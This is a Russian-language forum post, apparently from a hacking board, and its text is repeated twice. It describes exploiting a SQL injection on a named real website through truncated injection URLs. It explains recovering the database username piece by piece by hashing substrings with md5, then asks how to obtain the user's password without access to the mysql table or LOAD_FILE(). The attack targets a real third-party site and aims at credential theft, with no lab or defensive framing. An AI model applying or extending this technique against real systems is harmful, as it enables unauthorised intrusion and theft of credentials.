В найденной sql инъекции
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
при попытке вывода информации, вопреки многим статьям, описывающие sql инъекции получаем ошибку
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
и так
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
и так
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
как же нам все-таки получить имя пользователя?
Поможет функция md5:
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
однако ж подбор полного имени займет большое количество драгоценного времени
а такой запрос
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
вернет хэш первых трех букв. Далее следует логическое продолжение
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
и так далее до полного раскрытия имени.
Если кому-то эта информация кажется не новой, просьба не ругать, а дать ссылки на статьи в которых показана такая техника
вывода информации.
И дополнительно,
как получить пароль пользователя, если нет прав на доступ к таблице mysql и на использование функции LOAD_FILE()? Ведь знание одного только имени ничего не дает.
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
при попытке вывода информации, вопреки многим статьям, описывающие sql инъекции получаем ошибку
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
и так
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
и так
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
как же нам все-таки получить имя пользователя?
Поможет функция md5:
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
однако ж подбор полного имени займет большое количество драгоценного времени
а такой запрос
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
вернет хэш первых трех букв. Далее следует логическое продолжение
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
и так далее до полного раскрытия имени.
Если кому-то эта информация кажется не новой, просьба не ругать, а дать ссылки на статьи в которых показана такая техника
вывода информации.
И дополнительно,
как получить пароль пользователя, если нет прав на доступ к таблице mysql и на использование функции LOAD_FILE()? Ведь знание одного только имени ничего не дает.